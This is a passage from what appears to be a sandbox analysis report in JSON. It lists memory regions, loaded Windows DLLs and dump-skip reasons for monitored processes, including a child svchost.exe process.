"start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3877", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:05:38.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3878", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:05:38.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3879", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:05:38.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_3880", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:05:38.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1950154752, "type": "region", "version": 1 }, "end_va": 1950187519, "entry_point": 1950154752, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_3881", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1950154752, "timestamp": "00:05:38.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1950220288, "type": "region", "version": 1 }, "end_va": 1950597119, "entry_point": 1950220288, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_3882", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1950220288, "timestamp": "00:05:38.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1950613504, "type": "region", "version": 1 }, "end_va": 1950871551, "entry_point": 1950613504, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_3883", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1950613504, "timestamp": "00:05:38.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_3884", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3885", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2322431, "entry_point": 1900544, "filename": "\\Windows\\System32\\locale.nls", "id": "region_3886", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1900544, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 5439488, "type": "region", "version": 1 }, "end_va": 6488063, "entry_point": 0, "filename": null, "id": "region_3887", "name": "private_0x0000000000530000", "norm_filename": null, "region_type": "private_memory", "start_va": 5439488, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 8060928, "type": "region", "version": 1 }, "end_va": 8126463, "entry_point": 0, "filename": null, "id": "region_3888", "name": "private_0x00000000007b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8060928, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970106367, "entry_point": 1970077696, "filename": "\\Windows\\SysWOW64\\winbrand.dll", "id": "region_3889", "name": "winbrand.dll", "norm_filename": "c:\\windows\\syswow64\\winbrand.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971322880, "type": "region", "version": 1 }, "end_va": 1971372031, "entry_point": 1971322880, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_3890", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1971322880, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1971781631, "entry_point": 1971388416, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_3891", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1972109312, "type": "region", "version": 1 }, "end_va": 1973157887, "entry_point": 1972109312, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_3892", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1972109312, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973157888, "type": "region", "version": 1 }, "end_va": 1974271999, "entry_point": 1973157888, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_3893", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973157888, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1978073088, "type": "region", "version": 1 }, "end_va": 1978777599, "entry_point": 1978073088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_3894", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1978073088, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1980825600, "type": "region", "version": 1 }, "end_va": 1981468671, "entry_point": 1980825600, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_3895", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1980825600, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986551807, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_3896", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1987903488, "type": "region", "version": 1 }, "end_va": 1988005887, "entry_point": 1987903488, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_3897", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1987903488, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989083135, "entry_point": 1988100096, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_3898", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989124095, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_3899", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989476352, "type": "region", "version": 1 }, "end_va": 1990066175, "entry_point": 1989476352, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_3900", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989476352, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2004746239, "entry_point": 2004090880, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_3901", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005598208, "type": "region", "version": 1 }, "end_va": 2006622207, "entry_point": 0, "filename": null, "id": "region_3902", "name": "private_0x00000000778b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005598208, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006646784, "type": "region", "version": 1 }, "end_va": 2007822335, "entry_point": 0, "filename": null, "id": "region_3903", "name": "private_0x00000000779b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006646784, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_3904", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:05:38.159", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3905", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:05:38.160", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 9732095, "entry_point": 0, "filename": null, "id": "region_3906", "name": "pagefile_0x00000000007c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8126464, "timestamp": "00:05:38.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1980432384, "type": "region", "version": 1 }, "end_va": 1980825599, "entry_point": 1980432384, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_3907", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1980432384, "timestamp": "00:05:38.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1985413120, "type": "region", "version": 1 }, "end_va": 1986248703, "entry_point": 1985413120, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_3908", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1985413120, "timestamp": "00:05:38.162", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_3909", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:05:38.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 729087, "entry_point": 0, "filename": null, "id": "region_3910", "name": "pagefile_0x00000000000b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 720896, "timestamp": "00:05:38.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 790527, "entry_point": 0, "filename": null, "id": "region_3911", "name": "private_0x00000000000c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 786432, "timestamp": "00:05:38.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2363391, "entry_point": 0, "filename": null, "id": "region_3912", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:05:38.166", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 11341823, "entry_point": 0, "filename": null, "id": "region_3913", "name": "pagefile_0x0000000000950000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9764864, "timestamp": "00:05:38.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 11403264, "type": "region", "version": 1 }, "end_va": 32374783, "entry_point": 0, "filename": null, "id": "region_3914", "name": "pagefile_0x0000000000ae0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11403264, "timestamp": "00:05:38.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 3420160, "start_va": 32374784, "type": "region", "version": 1 }, "end_va": 35794943, "entry_point": 0, "filename": null, "id": "region_3915", "name": "pagefile_0x0000000001ee0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32374784, "timestamp": "00:05:38.167", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2490367, "entry_point": 0, "filename": null, "id": "region_3916", "name": "private_0x0000000000250000", "norm_filename": null, "region_type": "private_memory", "start_va": 2424832, "timestamp": "00:05:38.189", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs", "filename": "c:\\windows\\syswow64\\svchost.exe", "id": "proc_24", "image_name": "svchost.exe", "monitor_reason": "child_process", "monitored_id": 24, "origin_monitor_id": 22, "ref_parent_process": { "ref_id": "proc_22", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_3979", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_3980", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_3981", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_3982", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_3983", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 573439, "entry_point": 0, "filename": null, "id": "region_3984", "name": "private_0x0000000000070000", "norm_filename": null, "region_type": "private_memory", "start_va": 458752, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 1245183, "entry_point": 0, "filename": null, "id": "region_3985", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_3986", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 4882431, "entry_point": 4849664, "filename": "\\Windows\\SysWOW64\\svchost.exe", "id": "region_3987", "name": "svchost.exe", "norm_filename": "c:\\windows\\syswow64\\svchost.exe", "region_type": "memory_mapped_file", "start_va": 4849664, "timestamp": "00:07:38.043", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2007826432, "type": "region", "version": 1 }, "end_va": 2009567231, "entry_point": 2007826432, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_3988", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2007826432, "timestamp": "00:07:38.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2009792512, "type": "region", "version": 1 }, "end_va": 2011365375, "entry_point": 2009792512, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_3989", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2009792512, "timestamp": "00:07:38.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_3990", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:07:38.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_3991", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:07:38.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_3992", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:07:38.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_3993", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:07:38.044", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_3994", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:07:38.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_3995", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:07:38.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_3996", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:07:38.045", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1572863, "entry_point": 0, "filename": null, "id": "region_3997", "name": "private_0x0000000000140000", "norm_filename": null, "region_type": "private_memory", "start_va": 1310720, "timestamp": "00:07:38.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_3998", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:07:38.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3538943, "entry_point": 0, "filename": null, "id": "region_3999", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:07:38.065", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1950154752, "type": "region", "version": 1 }, "end_va": 1950187519, "entry_point": 1950154752, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4000", "name": "wow64cpu.dll", "norm_filename": 